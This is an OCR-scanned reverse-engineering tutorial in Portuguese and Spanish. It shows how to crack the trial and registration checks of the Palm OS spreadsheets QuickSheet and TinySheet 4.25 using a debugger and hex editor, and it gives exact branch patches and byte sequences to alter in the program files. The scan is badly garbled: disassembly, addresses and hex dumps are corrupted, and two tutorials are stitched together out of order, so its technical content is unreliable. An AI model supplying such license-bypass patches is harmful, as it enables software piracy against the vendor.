$351, DO 


* southDebugger v1.7 - UNREGISTERED 


File Execution 


Window Tools Plugins Help 


FIG. 4 


Eta 


GE CE 


Lira, 


12€) 


| disassembler | 


[ main | 


O disassembler [PC] 


dechex y 002c0E1C4 


address 


OOZ2CE1CS 
DOZCEICA 
OOZ2CE1CC 
CElIDO 
CElD2 
CElLDE 
DOZCEIDA 


DOZCElEE 
DOZCE1FO 


ODZ2CE1FC 
DOOZCEZOOD 


DOZCEZOZ 


DOZLCEZ06 


4E4FA1FD 
3004 
4FEFOO1E 
4CDFOC1S 
4E5SE 
4E75 


4E4FAO27 


48730002 


command notes 


MOVE. DO, D4 
MOVE. L nz añ) 
TPAP FF, f414639!7A1FD 
MOVE. W 24, DO 

LEA FSO!IF1E(A7) 
MOVEM.L  (27)+, D 
UNLE 

RTS 

LINE 

MOVEM. L 

PEZ 

TPAP 

MOVEA. L 

MOVE. L 


[sysTrapllinSetDrawllindor] 


¿TrapMenmPtrNern] 


SUBA. VW 
EPA 
CLP.E 
PEA 
MOVE. L 
TRAP 
PEA 


AO 


] 


DO 


] 


NnO?ratra ¿rara Toz»0o 


“413 Il|0p “4n12c£0122131041 


Fara Tras PD rn arde 


D02CE1C4 4E4FA194 TRAP B15!/5F, F41364!/3419% [sysTrapFrmCustomilert] 
FIG. 5 


Conforme visto na FIG. 5 o southDebugger parou na sysTrapFrmCustomAlert. Notamos que logo abaixo temos as instrugdes UNLK A6 e RTS. Como 
RTS significa RETurn Subroutine, concluímos que a Talt está em usa subrotina. Entáo precisamos descobrir onde ela é chamada. Pra isso executamos 
o código até o RTS marcando um breakpoint e teclando F5, conforme FIG. 6. 


'" southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


IBP 128 1 OO 
| disassembler | 
[ main | 


O disassembler [PC] 


0020 E1C4 


asc hex command 
DOZCE1C4 e 4E4F2194 TPAP F15!3F, f41364 72194 [sysTrapFruiCustomilert] 
DOZCE1ICS SO. 3800 MOVE. 1 DO ? Da 
DOZCEICA f ¿FO2A MOVE. 22, -1247) 
DOZLCE1ICE 2z 4E4F2A1FD TEAP F1S5!7F, f414689!721FD 
DOZ2CEIDO O. 3004 MOVE. 1 D4, DO 
DOZCEIDZ ia 4FEFOOlE LEA FSOIF1E(AT), 
DOZ2CE1IDE Dia 4CDFOc1S MOVEM. L 
DOZCEIDA ye 4ESE UNLE 6 
FS, volte ao POSE e clique 


DOZCElEZ 200 0 43E7?1030 MOVEM. L 
OS dE OS ANÁ dl no OK da Talt. Retorne ao 


OOZ2CELEA sn 4E4FA013 TRAP $1SI$F, 90979154013 [sysTrapmenternen NOA 


ODZ2CElEE ; 2448 MOVEA. L 
DOZCE1IFO a ¿00A MOVE. L 
DOZCEl1IFEZ xXO OS 
DOZCEl1F4 Es 660 ENE 
DOZCELIFÉE + 2103 SUBA. 1 
DOZCE1IFS EN 6054 ERA 
DOZCE1IFA ; : CLR.E 
ODZ2CE1FC HX... ¿ PEZ $16!/7$10.0 
ODZ2CE200 f 2FOJ2 MOVE. L 22, -(47) 
OOZCEZ0Z A TRAP FISIGF 


DOZCEZOÉS 


Pos 
to 


para executar passo a 


Pre 
to 
E) 


E 


n 
EN 
o 


r 


[002CE15E-002CE1DE]: 


Pe E SE DUZCE BE j 


D02CE1C04 4E4FA194 TRAP F15!5F, $41364!/54194 [sysTrapFrmCustomilert] 


FIG. 6 


Depois de adicionado o breakpoint, tecle F5, vá ao POSE, clique no OK da Talt e retorne ao southDebugger. Tecle F8. A tela da FIG. 7 exibe para onde 
a execucáo retornou 


'" southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


(3 


Nor 


Liz, 


¡GEa 


| disassembler | 


«E| CE 


OO 


[ main | 


O disassembler [PC] 


dechex Y (DO2AFBB2 


address ascii HAY) corminard 
2FOA MOVE. L AZ, (47) 


4E4FA0ZZ TRAP $15!5$F, a0z2 

programa retorna aqui. 2FOA MOVE.L 22, -(A7) 
DO: Eb NO.a 4E4FA061 TRAP $15!$F, $41057!f$A061 [sysTrapDnPeleaseRes 
DOZAFEBE o. OFF MOVEO $3-1, DO 
DOZAFECO a. y MOVE. L DO, fi-4126) 

MOVE.E 
DOZAFÉCE PR K : MOVE. W 
DOZAFECO A 436 ; PEA 
DO0ZAFEDO ¿isa ¿ CO01EDOOS MOVE. L $17 281/$180009, -(147) 
00Z2AFEDE ¿aSpr EF3CS37O07Z3 MOVE. L 4139958781: $53707231, - (47) 
DOZAFEDO JO. 4E4F22D4 TEAP F15!7F, f£416234!/722D4 [sysTrapPrefSetippPreferences] 
DOZAFEEO o. 7001 MOVEO $21, DO 
DOZAFEEZ D.-¿ 4FEFOOZ4 LEA $: 4147), A7? 
DOZAFEES AÑ 600003 ERA F1020!133FC ¿DOZAFAEd 
DOZAFEES «Ml 7O00A MOVEO $10!32, DO 
DOZAFEÉEC si ESS30 Cup. L DO, Dd 
DOZAFEEE 6F30 BLE $43 /730 ¿DOZAF?ZO 
DOZAFEFO 9 200F MOVED F15!7F, DO 

SUB. L D4, DO 

Pe E MOVE. L 

DOZAFEFE 1. Xx 436 23 PEA 
DOZAFEFA ñ JE4FAOCO TRAP 
DOZAFEFE 1. Xx 436 23 PEA 


A0 
DO 


DO | D1 | D2 | D3 | D4 | D5 | D6 | D7 | USP 


DOZAFE6B2 2FOA MOVE.L  A2, -(47) 
FIG. 7 
Clique em << para verificar onde a subrotina foi chaamada 


= southDebugger v1.7 - UNREGISTERED la Jl Xx] 
File Execution Window Tools Plugins Help 


BRE [el WEE 900 


—————— añ g< >» 


address | ascii ] hex | command notes | 


DOZAFEÉGO HAZ... 437ADO0E PEA Fl14!/E(PC; 
DOZAFE7O Hz.. 437240004 PEA $54 (PC) Desvio para 
DOZAFETA DESTFFFFEAOC ADDI.L—— $-5620!: id a chamada 
DOZAFETA Mu 4E75 ETS 
DOZAFER?O í » ¿5800 MOVE. L po A Dd d a 
DOZAFE67E p. 4 lznor MOVEQ FISI$F, DO subrotina. 
DOZAFESO CHP.L DO, D 
DOZAFESZ of Le BLE 
DOZAFESd 7 1 e MOVE . 1 
DOZAFESS ESTE y ; MOVE. L F19516138130!/5 74535452, -(27) 
DOZAFESE NO. e 4E4FAOS5F TEAP F1SIFF, f$41055!13A05F [sysTrapDncetPesource] 
DOZAF692 a 2448 MOVEA.L 240, 22 
DOZAFESA 15 dias WN 2FOA MOVE.L AZ, -(2 
DOZAFESE NOo.! 4E4F2021 TEAP F15!5F, f409293 724021 [sy<oTrapMemHandleLock] 
DOZAFE9SA xO 534F ¿DD O. TW fj4, 27 
ñ É. ¿ a MOVE. L 240, -(47) 
DOZAFESE Le 1F3C20003 MOVE.E E; - (47) 
DOZAFEAZ A 6004 BRA Fl10!jA ¡¿OOZAFEAE 
DOZAFEAA pr ¿000 MOVE. L DO, DO 
DOZAFELÓ ¿000 MOVE. L po, DO 
DOZAFELAO s ¿000 MOVE. L DO, DO 
DOZAFEMLA e ¿000 MOVE. L DO, DO 
DOZAFEAC sE 2000 MOVE. L DO, DO 
DOZAFELDE N... 4EACFFDC K-36!17-24124) 


A0 E] | A2 | A3 | ña | AS | A6 A7 [ PC 
DO D1 | D2 | D3 | Da | D5 | D6 | D7 | USP 


DO — m1 —p2 [209 DA DS —D6 or Use 


[002A4F53A-002AFAEC]: 


DO2AF6B2 2FDA MOVE .L pe E) 


FIG. 8 
Observe a FIG. 8. Vemos a linha JSR ++-36!$-24(A4). Essa linha é a chamada para a subrotina da Talt. (JSR significa Jump SubRoutine). 
Ela é chamada se a condicáo da linha 2AF682 (BLE +102!$66 ¡002AF6EA) náo for satisfeita. BLE significa Branch if Less or Equal, ou seja, “vá para a linha 
2AF6EA se D4 <= 15”. Veja na FIG. 8 que DO recebe $F (+15) e depois é comparado com D4. Vamos entáo trocar de BLE para BRA substituindo 6F para 60. Com 


isso dizemos “vá para a linha 2AF6EA independentemente do que aconteca hehehehe ] ”. Pra isso clique com o botáo direito do mouse sobre a linha e no 
menu pop-up clique em “Change memory content”. Substitua o 6F por 60. Deve ficar como na FIG. 9. 


'"= southDebugger v1.7 - UNREGISTERED EEE 


File Execution Window Tools Plugins Help 
Erre €, 


[ main | 


3 disassembler 


dechhex y | OD2AF6B6C | E E] « | E | > | 29 
address ascii | hex cornrmand notes 

DOZAF66c Hz.. 00 PEA Hl4!5E(PC) 

00ZAFE7O Hz.. O PEA g34 (pc) 

a DESTFFFFEAOC ADDI.L $-SE6Z20!$-15F4, (A7) 

DOZAFETA Ma 4E75 PTS 

OOZAFE7C to 2800 MOVE.L DO, Da 

002 p. 700 MOVEO $15!¿F, DO 

00z E 380 CMP.L DO, D4 : : 

0nz E 6066 EPA 102/7566 ¿ODZAFEEL 

00Z2 9<.1 3F300543 MOVE. 135315549, -(27) alterado. 

00Z /<tSTR 2F3074535452 MOVE.L — f1951618130!$74535452, -(47) 

oz NO. _ 4E4FAOS5F T.EAP F15!7F, f41055!/7205F [sy=sTrapDmcetResource] 

002 ¿$H 24483 MOVEA.L 20, A2 

DO0z sl ZFOA MOVE. L 22, - (147) 

o0z NO.! 4E4F2021 TRAP $15!3F, $40993 72021 [sysTrapMenHandleLock] 

DOZAFESA xo 534F ADDQ.Wo $34, 47 

DOZAFÉ9C ee ¿FOS MOVE. L 20, -(147) 

DOZAFESE e 1F3C0003 MOVE.BE $33, -(A7) 

DOZAFELZ : 6004 ERA F10!5A ¿OOZAFGAE 

DOZ2AF654 ES 2000 MOVE. L DO, DO 

DOZAFE6A6 o 2000 MOVE.L DO, DO 

DOZAFEAS En 2000 MOVE.L DO, DO 


DOZAFEAS ie ¿000 MOVE. L DO 7 DO 


DOZAFELA > ¿000 MOVE. L DO, DO 

DOZAFEAO 2 ¿000 MOVE. L DO, DO 

DOZAFEAE N... 4EACFFDE ISR H-36!17-241(24) 
AD A1 a2 A3 Ad A5 A6 az PC 
DO D1 D2 D3 D4 D5 D6 D7 USP 


DOZAFÉ6BZ ¿FDA MOVE.L a2, 1247) 


FIG. 9 


Execute novamente o QuickSheet. 


* southDebugger w!.7 - UNREGISTERED | a o 
File Execution Window Tools Plugins Help Palm OS Emulator 


¡BH (e El CE IEEE YÓ0 
_ disassembler | breakpoints -1 dia(s) 7? 


Funcionou!!!!! 


[main | 


| disassembler [PC] 


dec'hex v | 002c0E1C4 


address ES You only have -1 day(s) 
OZCE1C4 5 P - - 
OO2CE1CS 8. MOVE. 1 left on this trial. To 
DOZCELCA y MOVE. L keep using this program 
OOZCE1CC NO.. 4E4FA1FD TRAP uninterupted, please 
DOOZCE1IDO D. 3004 MOVE. Y K 
DOZCEIDE Dos 4FEFOOlE LEA purchase. 
DOZ¿CElIDE is 4CDFOC1S MOVEM. L 
OOZ2CEIDA N' 4ESE UNLE 
DOZ2CE1IDCO Nu 4E75 ETS 
DOZCEIDE NY... 4ES60000 LINE 
DOZCElEZ he 435E71030 MOVEM. L 
DOZCELES Mesma subrotina 48780010 PEA 
DOZCELEA NO.. 4E4FA4013 TEAP F1S5!7F, f£4097 
DOZCE1EE ¿H 2448 MOVEA.L A0, A2 Mesma Talt com conteúdo 
DOZCE1IFO e Z¿00A MOVE. L 22, DO . 
DOZCELFZ x0 A diferente. 
DOZCE1F4 f. EME $34 ¿DOZCELFA 
DOZCElFE E SUBA. W 20, 20 
DOZCE1FS ca ERA F90!I75A 
DOZCEl1IFA E' CLP.B 1247) 
"Tarda rd E ra TT» HXHUTPi2S2 


DOLCELFA de 4L£ LLE.E 

DOZCE1FE Hx.. - 4s 730010 PEZ f16!/5$10.1 
DOZ2CEZ00 f Z2FOA MOVE. L al, - (47) 
DOZCEZOZ 4E4FA027 TEAP Fl1S5S!7F, f£4099 


DOZCEZ06 > PU PEZ $32. 


22 24 
D2 D4 


[002CE15E-002CE1DE]: 


al 


waiting for breakpoint.. 
D002CE10C4 4E4FA4194 TRAP B1S!5F, 441364 !/541099 [svysTrapFrmCustomiálert] 
is Iniciar OQ >” MrElra.  Ulpatch.. QuickS... southD... | southD...  “PalmO.. PT [E MAA TE 


FIG. 10 


Como podemos ver na FIG. 10 após executar novamente o QuickSheet, a Talt agora mudou, entretanto ainda usa a mesma subrotina para mostrá-la. 
Temos agora que mudar o código que chama a subrotina da Talt pela segunda vez. 


Execute o mesmo procedimento para a primeira Talt (tecle F8 para executar passo a passo até sair do RTS e voltar pra onde a subrotina foi chamada) e 
verificamos o código conforme FIG. 11. 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


IB (e ca 1818 


NOoP 


[ main | 


OD 


dechex 


address ascii hex command 
OZAFEED a. 2001 MOVEO 


AFGEZ O.-$ 4FEFOOZ4 LEA : 
OZAFEES uo. ERA Desvio para 


OZAFEEL o. ¿002 HOVEO a chamada 
ZAFEEC % 2280 DO, D4 da 
LFGEE 00 sas 1g3o subrotina. 
LFEFO «e 200F MOVEO $15!$F, D 
OZAFEFZ 2 9084 SUB. L D4, DO 
LFEF4A Ll ¿FOO MOVE. L DO, -1247) 
OZAFEFE 1. Xx ¿ PE PEZ f-136!/7-258 (26) 
ZAFÉFA Le 4E:< TEAP F15!/5F, f41161!/32009 [sysTrapStrIToaA] 
ZAFÉFE ak 4: y" PELA f-136! 16) 
LEPE MA 415 z LEX F£1010!$3F2(PCi, 40 
LEROE + 7 PEL (204 
OZAF?OS E 3C0 3 MOVE.E $33, - (27) 
¿ 2 BRA f10!/324 ¡¿OOZAF7?1S 
Restando 10 dias para ete tos que DO 
terminar o prazo de trial MANS AA PAE 
¿2000 MOVE. DO, DO 
lotadados Talt aparece ¿000 MOVE. DO, DO 
exibindo o número de MAA MOVE.L DO, DO 
dias restantes. 4EACFFDC ISR $-3615-24 (44) Subrotina da Talt 


laos 1BE?CODO1DOSDE MOVE.E $$l, $-97701$-2 


A1 A2 | 


DOZAF?1C 4FEFOD12 LEA F198 $12 (47) [=H%50], A? 
is Iniciar Seo A E: Ara... UY Patch ... Quick... southD... HE outhD... =' Palm O... PT PR ? 


FIG. 11 


Veja a FIG. 11. Proceda como anteriormente e altere BLE para BRA alterando o byte 6F para 60. 
Execute novamente o QuickSheet. 
Pronto!! O programa está patcheado. 


Agora precisamos tornar permanente o patch. Abra o QuickSheet.prc no ultraEdit e procure pela segúéncia de bytes 70 OF B8 80 6F 66. Veja FIG. 12. 


€” UltraEdit-32 - [E:MArquivos de ProgramasiStanleyWPalmiCrackPRCsWuickSheet.PRC] 


3)OGo5ujeR A Win|=|:mm|= === 


O File Edit Search Project view Format Column Macro Advanced Window Help 
y. : 


72 65 : driver for spre 
73 65 ; adsheets..Please 
73 69 ; check our websi 
67 20 ; te for printing 
Find W'hat ¿E 71; SEO di 
¿F 71; uickoffice.cor; a 
61 62 ; uicksheet...Unab 
65 62 le to locate thi 


3 spreadsheet to 
print. .NVpbóHc. 


AQ. Cia” 


R -J 
a Él 
bo 
o > 
mo» 
101) 


Direction 


FP FindásCil C 
Match Case há Up FF FC; 


52 40 :; 
0 A TF Regular Expressions [45.11 Orly) 1F 30: 
00 s0h: 00 01 3F 30 00 04 48 6E FF FC 2F 3€ 00 18 00 09 :; 
oo 90h: 2F 3C€ 53 70 72 31 4E 4F A2 D4 4F EF 00 10 60 00 ; 
Do a0h: 00 DO 70 FF BO 24E FF FC 66 04 70 10 60 1E 4E 49F : í 
Do bOh: A0 FS 20 AE FF FC 22 3€ 00 01 51 50 48 74 DO OE :; 0 mite, Ga 
DO cóh: 43 724 00 04 06 97? FF FF El 0€ 94E 75 25 00 quina : Z...—vé.Nul 


00 UNES 350 6F 66 Ela A 
00 eh: 40 5 i OA 4E 4F AO 21 58 4F 2F 08 1F 3C ; —_ 5H .NO ' : 
00 ¡efOh: 00 03 60 0% 20 00 20 00 20 00 20 00 20 00 94E AC 2 0... . . . . «a 


o 


FIG. 12 


Altere o byte 6F para 60. Agora procure pela seqúéncia 70 OA B8 80 6F 30, conforme FIG. 13. 


00033eb0h: A0 FS 90 AE FF FC 22 01 51 80 45 74 00 OE ; 
000 48 74 00 04 06 97 FF OC 4E 75 28 00 70 OF ; 

ajaja BS 50 6F 66 3F 30 05 30 74 53 54 52 4E 4F ; 

000 10 ES A 4E 21 58 4F 2F 08 1F 3C ; 

ooo oo oO 20 DO ¿0 00 20 00 4E AC :; 

000 FF 140 22 2F DA 4E 4F A0 61 70 FF ; mE, 

DO 2D DO 01 3F 30 00 04 48 6E FF FC; di 

DO 2F 2F 3C 53 70 72 31 4E 4F A2 D4 ; /<...., ; 4 
DO 70 01 4F EF 00 24 60 00 03 rc ECO : p.0:.5 RE 
00033£40h: fo OF 90 84 2F 00 48 6E FF 78 4E 4F AO C9 48 6E ; [3.0../.HnyxNO ÉHn 
D0033f50h: FF 78 41 FA 03 F2 48 50 1F 30 00 03 60 04 20 00 ; fxAú.oHP.<..* 


MA an An 2A An A AN A An ar AC OTE RF? Ar Tr nn 41% * MT ++ TI 


FIG. 13. 
Altere o byte 6F para 60. Agora procure pela seqúéncia 70 OA B8 80 6F 30. 


Salve o programa e sincronize com o palm. 


Afer Ventus 
Brasil 


post nubilaWyahoo.com.br 


Palm Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre Ingeniería 


Inversa y Programación en Palm. E-mail "Colabora con tus Proyectos" 


Palm Spanish Tutor 


()Serial ()HotSync/Code ()Trial ()Multiprotección ()Encriptado (X)Otro 
Excel para palm con más funciones que QuickSheet 


Patch do TinySheet Versáo 4.25, validar cualquier serial 
(X)NewBies ( )Intermedio ()Avanzado ()Master ( )Gúru 


DOWNLOAD: | http://www.iambicstore.com 
SouthDebugger, PRCedit, PilotDis. Palm Real ó Pose emulador, UltraEdit-32, PalmDemon 0.27 PalmDebugger 


Nubila | recha : 8/29/0ct /2005 


INTRODUCCION 


Patcheando o TinySheet 4.25 
Parchando TinySheet 4.25 


AL ATAQUE 


O TinySheet é um programa de planilha eletrónica como o Excel para PC e o QuickSheet para Palm. A diferenca entre TinySheet e o QuickSheet, 
além do tamanho e outras coisas, é o recurso de fazer gráficos. O TinySheet traz mais opcdes para gráficos sendo melhor que o QuickSheet. 


TinySheet es un programa de hoja de calculo como el excel es a windows este es a palm ó como QuickSheet, A diferiencia de TinySheet a 


QuickSheet, Este tiene muchas otras funciones, y recursos de gráficos. TinySheet tiene más opciones de graficos siendo mucho mejor que 
QuickSheet. 


me iambic, Inc. 


TinySheet 


version 4,25 


All rights reserved 
Cericell: G3FIM1 
Aug 18 2003 22:23:41 build ¿45 


Fig 1 


How do | purchase 7 


You can order TinySheet now 
for only US$29_95 


Device lD: G3FIN1 


To purchase online (fastest) 


httprrcwormbicstore.cor 
To purchase vía email: 
solezemioarmbic.cora 


To purchase via fax: 


(A ae 2 OZ 


Enter code 


FIG. 2 


Após algum período de uso, o programa tem suas funcionalidades limitadas, sendo possível apenas abrir arquivos já existentes e visualizá-los. Alteracdes, salvar e 
criar arquivos deixam de funcionar. 


Pasando el perido de prueba este programa tiene funciones limitadas , siendo apenas posible el poder abrir archivos ya existentes y poderlos visualizar, 
ya no se puede modificar,crear,guardar archivos y más funciones como está ya no funcionan. 


Na FIG. 2 o programa exibe um DEVICE ID que neste caso é G3FIM. 


En la Figura .2 el programa muestra una clave ID , en este caso es G3FIM 


Software Registration ( 


Plegdze enter your code buelciy: 


67890 


[ Enter E E Cancel 
FIG. 3 
Sorry, a problem has 
occurred: Invalid License 
FIG. 4 


Ao digitar qualquer código (conforme FIG. 3) a mensagem da FIG. 4 aparece. Sabemos que é uma Talt entáo setamos um breakpoint na sysTrapFrmCustomAlert 
conforme FIG. 5. Para isso usamos o southDebugger. 


Al escribir cualquier código (Ver FIG.3) Aparece el mensaje de la figura. 4, sabemos que esta es una talt y que podremos poner un breakpoint 
"sysTrapFrmCustomaAlert" como se muestra en la FIG.5 , para eso usaremos nuestro amigo el debugger "southDebugger". 


'" southDebugger v1.7 - UNREGISTERED 


File Execution 


Window Tools Plugins Help 


¡Bee 8118 OO 
| disassembler Í register | memory dump | trap stack l breakpoints 
[ main | 


¡| breakpoints 


a E) 


| breakpoints | trap breakpoints 
<ysTrapFrmCustomilert 
NOT £ 


NOT S 
NOT 


cond. trap breakpoints | 


3AFEDO 
3AFGE0 


DOSAFÉFA 


4FEFOOOS 
£601E 
OCSEOOOBFFDE 
660EÉ 
3F2EFFDA 
4227 
dEBAFACÁE 


2000 
4CDFOC 
4ESE 
4E75 


command 


MOVE.E 
MOVE. 1 
TPAP 
MOVEA. L 
MOVE. L 
TEAP 
MOVE. 
TRAP 
LEA 
EPA 
CMPT. 1 
BMNE 
MOVE. 1 


F9500 (a 


$15!5F 


, 


F3DIS1E 
$11/3E, 


-(A7) 


$-1340!1$-530 ¿0035 


$54 


a? 
, 


¿OOSAFEFZ 


MOVEO 
MOVEM. L 
UNLE 
ETS 


£30, DO 
(a+, 


26 


D3/D4/D5/ 


F4l132717A16F 


TrapFribobialog] 


TrapFriDeleteForm] 


A0 


A2 


DO 


D2 


[0034F490-003AF6FC]: 


PrvHandleEvent 


10019882 7001 MOYEG 


$31, DO 


FIG. 5 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


EE 


[5 /658| (CE (E 


Li, 


cz€, 


_ disassembler register | memory dump | trap stack | breakpoints 


[ main | 


E disassembler : 


DOSAF4BA 


hex 


command 


4EBA17C0 
4AZ2EFFEA 


4EA4DFSOS 
2001 


3DE6SO0D4FFDE 
41FA01FA 
Z¿DSOFFD4 
3D630004FFDS 


¿DOSBOC?C 


j ¿OO3SAF4DE 
MOVE. W t 21$26 (47) 
JS. 
MOVEO 
ADDGO.W 


Enter hex values. 
67po 


Cancel 


CHPI.Wo $211$15, fEf-2(26) 

ENE $1281$80 ¿O03AFS76 
LEA FS1413Z02 (PC), AD 
MOVE.L (20), $-SO!F-32 (26) 
MOVE.Wo $34(20), $-46!13-ZE(26) 
LEA EFSOGIS1FA(PC), 20 
MOVE.L (20), f-44!15-2C (26) 
MOVE. $$4(20), $-40!15-28(26) 


Setar um 
breakpoint 
nessa linha. 


Il ñ4 [ AS 


| D4 | D5 


D03A4F4C02 


5 


fl 


14F 2DDGQ.t 


FIG. 6 


Executamos o programa e quando ele atinge a Talt a tela da FIG. 6 aparece no southDebugger. 
Precisamos saber onde essa Talt é chamada. Pra isso setamos um breakpoint no RTS logo abaixo da sysTrapFrmCustomAlert e teclamos F5. 
Retornamos ao POSE, clicamos no OK da Talt e retornamos ao southDebugger. 


O southDebugger agora está no breakpoint setado no RTS. Teclamos F8 para executar o RTS a tela da FIG. 7 aparece. 


'" southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


¡Bj (e) 08 LLE OO 
| disassembler | register | memory dump | trap stack ! breakpoints | 
"main | 


| disassembler 


dec/hex dd | DOGAF4BA | (EA | % | ll? | $9> 
add , E hex command back! 
pa ricas Se essa condigáo eS ER *e60s0!1¿17C0 ¿OOSBOC?C 
O for satisfeita vai Ga 2 : qe 
ADDO- 1 


para 003AF4D6 
caso contrário 
exibe a Talt. 


Essa é a chamada 
para a subrotina 
que exibe a Talt. 


DO314F4C4 


DO3AF4CO 


¿DDO.v 
ERA 
CHPI.V 
BE 


¿OOSAFEFA 


$-1C(246) 


Após teclarmos F8 
o debugger retorna 


DO3SAF4DO 


6710 


nessa linha. 


DOSAF4DE 7. MOVE. W 
DOSAF4EZ mM. ISR 
O3SAF4E6 pP- 7001 MOVED 
DOSAF4ES TO 544F ¿DDO.v 
DOS2AF4 ES ; énonozos EPA 3 
1 CHPT.V í 
D00O3AF4F4 E: ENE ¿DOSAFS7E 
a As LEA 
DO3AF4FC -P. ¿DSOFFCE MOVE. L (20), 
DOSAFSOD =h. 3DESODO4FFDZ MOVE. W $34 (240), $-d46!$-2E(A6) 
A... 41FA¿01FA LEZ *SO06!171FA(PC) 
DOSAFSOA =P. ¿DSOFFDA MOVE. L (20), H-d4d!- 
DOSAFSOE =h. MOVE. W $34 (A0), £-40!S 
AñO a1 a2 A3 M4 | AS A6 az PC 
re 1 EA 1 re 1 re 1 rw” WT a 1 y 1 mn, 1 rr 1 


DO | D1 | D2 | D3 | D4 | D5 | D6 | D7 | USP 


[0034F490-003AF6FC]: 


JOJAFACE 7001 MOVEO $31, DO 
FIG. 7 


De acordo com a FIG. 7 a rotina da Talt é chamada se a condicáo BNE... náo for satisfeita. O que temos que fazer a principio é mudar BNE para BEQ. 


AT A | EEx] 


P File Edit view Tools Window Help - 


a 


TinySheet4 patched pre | RCP | code0003.s | code0004 s | code0005. s | code0001.s | codeb002 codeOl006. s | 


0015930 246e0008 MOVEA.L 8116),22 A 
001534 ¿DDa MOVE.L 
EEO 
TST.B 
BENE 
L261 MOVE.  f92901!'$26ad,- (47) 
JSR -20901451 
MOVEO $1,DOo 
ADDO. VW 
BRA 
L262 PEA 
MOVE.L A2,-(47) 


14 Forms 
23 Alerts 
99 Strings 
Y DataD 
Y deb 


Do00D1b36 
oono0ib3s 
2 DODO1b3: 
Do01b3c 
001540 
001544 
001546 
001548 
00140 
001950 
00152 
001b56 
O0lbSa 


++ + + (+ 


El Cha nges 
3 Search Results 


ADDO. VW 


3f3c26ae MOVE.W F9902!'$26ae,-(47) 
4eadf808 JSR -2040 (15) 

MOVEO 
oo0o0o01b6S 5441 ADDQ.V 
O01bba BRA 
O001bbe L263 CMPI.W f5,-28/(126) 

0017: BEQ L264 

001076 MOVE.W.  F2904!$2650,-(47) 
o01ib7a 4eadis5D5 JSR 2040 (145) 

onib?e 2001 MOVEO $1,D0O 

001950 5941 ADDQ. VW 


O 2 eo00o02 05 ERA 


6 


001h 


L264 CMPI.V 
BME 
LEA 


Ocóbe 


onibsc 6600 
001930 
0015394 MOVE. L 
00195 MOVE... 41140), ,-46/(16) 
o0oibh9e 4ifaDifa LEA L2i 


A a 
(10) ,-! 


Es 


225 O001haz ¿dasotfrid4 MOVE.L 11401 .-44/261 
< | > 


r 
P 
ru 


IString: 


Veja a mesma rotina da FIG. 7 no preEdit da FIG. 8. Se encontramos a mesma rotina no prcEdit significa que o código náo está criptografado, o que facilita 
bastante o trabalho. 


Ln 2276, Col 45 


FIG. 8 


Prcedit - [E:lArquivos de ProgramasiStanleyWPPalmiCrackiPRCEsiTinySheet4.patched.prc] 


P File Edit Insert View Tools Window Help 


Resources 


23 Strings 

CJ DataD 

£3 dc.b 

23 Keywords 

2] Changes 

2] Search Results 


+-4-8-6-0-E 48 


Alteracáo de 
66 para 67 
Nx 


1 
] 
1 


3FDO 2F0A 
2FOA 4EAD 

: ADC? 5564F 
foo2 7000 
2FO3 4656ÉE 
3D6É 0008 
4B86É FFFC 
3600 3F2E 
4443 4FEF 
0001 EASDA 
0001 ESDA 
1030 246E 
7001 6066 
5 2FOUA 
¿2FOB 
FFFA 
6026 
4E4F 
6004 
4E56 
4312 
6000 


tad E al e NN SN] 


: ÁZb 
FFFC 
4nbE 
7001 
FFFA 
584F 
4E75 
6704 
544F 


4EAD 
F784 
3F00 
261F 
FFFE 
FFFC 
AE 4F 
FFFE 
0014 
302E 
261F 


F736 
4400 
2F ODA 
245F 
4E4F 
302E 
A264 


BDO6 
FFFE 
4E5E 


ooos 7A400 


486E 
4EBA 
4EBA 
2F2E 
3F2E 


FFFA 
20EE 
210€ 
FFFC 
FFFE 


ol 
2263 9640 
7002 6002 


FFCE 
6610 
0242 4586É 


48E7 


4E4F A: 


3F3C 264 


ad10:0 0:50 00.000 O (00:50 00 O O O 0 


452E 


2041 


E O E4aAR 


FFEA 504F 16710 


enana. n232n 


Mudamos o BNE para BEQ (alteramos o byte de 66 para 67). 


7001 
5504F 
4EAD 
4ES5E 
A2DF5 


4FEF 
6716 
7356 
4E75 
2F00 
5340 
FFFC 
3 9640 
ponte 
0004 
4E56 
6704 
ADFS 
47F2 
4FEF 


dooc 


BEBE 
EDBE 
4E75 
2004 
4E4F 


4400 


A263 
206E 000€ 
000 4CDF 


DODE 
2FDA 
7001 
4ES6 
4E4F 
48c0 
4E4F 
3B43 
6FOb6 
6406 
FFFS 
412 
2FD0 
4000 
0014 
504F 
3600 
3083 
0038 


an FabD6 


DA 4EBA 


3F3C 


NAEr 


26AE 


FIG. 9 


4EAD 


EF 41 


6024 
JE4F 
504F 
FFFC 
2265 
¿FD0 
A2b3 
EADE 
1B70 
1B70 
4BE7 
6604 
4E4F 
45bE 
6710 
6004 
3F2E 
42443 
JESE 
2004 
7001 
1700 
F808 


Erin 


2d? yuNOge 
6.?.vpNOcrcIlS;Céb 
JCOT mA. 0004 | 
S00.ypb*n...d..|] 
. 608. .N"NuNv yvaHe 
¿Us ds Ds 

IYÚNO 54.NO 
tes .N2 18.600.Hn 
Ur .N21 JT Dl... 


vúNO0ctcia n. .OLJC 
X01l.p.  .p.LB.8N* 
NuNvyTHc 
q.J.f. 
TO"... B 
J.yéPODg.? 


r> e r :rarr 


= southDebugger v1.7 - UNREGISTERED Oe) 
File Execution Window Tools Plugins Help 


Bl cE 1212 OO 
— disassembler register | memory dump | trap stack ! breakpoints | 


[ main | 


O disassembler 


dechex v [0 OSAFABA 


address ascii hex command 
3AF4EA Mo: 4EBA17C0 fe6o0s0!1$17C0 ¿DOSBOC?C 


AFA4BE 4AZEFFEA 


A 6610 EME 
AF4C6 726 3 MOVE. ; 2 deactivate breakpoint 
AF4CA A 4EADFS08 JER 
AF4CE 

AF4DO 5de ADDO- 1 $32, 2 go until 


remove breakpoint 


AF4DZ ra 60000 BRA $544! set next command 
AF4DE IE CMPI.W : 


2¿F4DpOe ds 6710 BE0 $16 1710 ¿OOSAR 
2¿F4DE 76. 3F3l BO MOVE. F9904!1726B0, 7 new memory dump window 
3AF4EZ To 4E2DFS0S JSR $-2040!3-7F3 (3 
3AF4E6 a. 2001 MOVEO $? po 
